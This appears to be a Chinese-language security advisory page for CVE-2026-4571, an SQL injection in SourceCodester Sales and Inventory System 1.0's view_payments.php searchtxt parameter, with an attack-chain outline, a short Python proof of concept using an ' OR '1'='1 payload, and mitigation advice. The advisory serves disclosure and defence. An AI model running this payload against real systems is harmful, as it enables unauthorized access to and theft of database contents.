CVE-2026-4571 CVSS 6.3 中危

CVE-2026-4571 SourceCodester 销售库存系统 SQL注入漏洞

披露日期: 2026-03-23

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-4571

漏洞类型

SQL注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

SourceCodester Sales and Inventory System 1.0

漏洞概述

SourceCodester Sales and Inventory System 1.0存在SQL注入漏洞。该漏洞位于/view_payments.php文件的HTTP POST请求处理组件中，由于对参数searchtxt缺乏有效过滤，低权限攻击者即可远程利用。攻击者可通过构造恶意SQL语句窃取数据库信息、篡改数据或影响系统可用性，且相关利用代码已公开。

技术细节

该漏洞属于典型的SQL注入漏洞，发生在SourceCodester Sales and Inventory System 1.0的视图支付功能模块中。在处理/view_payments.php的POST请求时，后端代码直接将用户提交的searchtxt参数拼接到SQL查询语句中，未进行任何预编译、参数化查询或输入过滤。攻击者无需用户交互，仅需低权限账号即可向该接口发送包含恶意SQL代码的POST请求。通过利用基于错误的注入或联合查询（UNION SELECT），攻击者可以读取数据库结构、提取管理员密码哈希、窃取客户订单信息等敏感数据。考虑到CVSS 3.1评分6.3，该漏洞对机密性、完整性和可用性均造成低至中等程度的影响，且利用难度较低，风险显著。

攻击链分析

STEP 1

步骤1：信息收集

攻击者识别出目标正在运行SourceCodester Sales and Inventory System 1.0，并确定/view_payments.php端点可访问。

STEP 2

步骤2：构造Payload

攻击者针对searchtxt参数构造恶意的SQL注入Payload，例如使用单引号截断查询或使用UNION SELECT语句。

STEP 3

步骤3：发送恶意请求

攻击者向目标服务器发送包含恶意searchtxt参数的HTTP POST请求。

STEP 4

步骤4：执行注入

后端数据库执行攻击者注入的SQL语句，返回敏感数据或报错信息，从而确认漏洞存在并获取数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL
url = "http://target-ip/view_payments.php"

# Payload to test SQL Injection
# Using a basic boolean-based payload to check vulnerability
payload = "' OR '1'='1"

# Data to be sent in POST request
data = {
    "searchtxt": payload
}

try:
    response = requests.post(url, data=data)
    # Check if the response indicates successful injection (e.g., returns all records)
    if response.status_code == 200:
        print("[+] Potential SQL Injection vulnerability detected!")
        print("[+] Response snippet:", response.text[:200])
    else:
        print("[-] Request failed with status code:", response.status_code)
except Exception as e:
    print("[-] An error occurred:", str(e))

影响范围

SourceCodester Sales and Inventory System 1.0

防御指南

临时缓解措施

建议立即部署Web应用防火墙（WAF）规则，拦截针对view_payments.php接口的异常POST请求。在未升级前，应在代码层面对searchtxt参数实施严格的输入验证（如仅允许数字或特定格式），或暂时禁用该搜索功能以防止攻击。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-4571
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-4571
3 Details https://www.cvedetails.com/cve/CVE-2026-4571/
4 VulDB https://vuldb.com/cve/CVE-2026-4571
5 Link https://github.com/meifukun/Web-Security-PoCs/blob/main/Inventory-System/SQLi-ViewPayments-searchtxt.md
6 Link https://vuldb.com/?ctiid.352408
7 Link https://vuldb.com/?id.352408
8 Link https://vuldb.com/?submit.775166
9 Link https://www.sourcecodester.com/

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表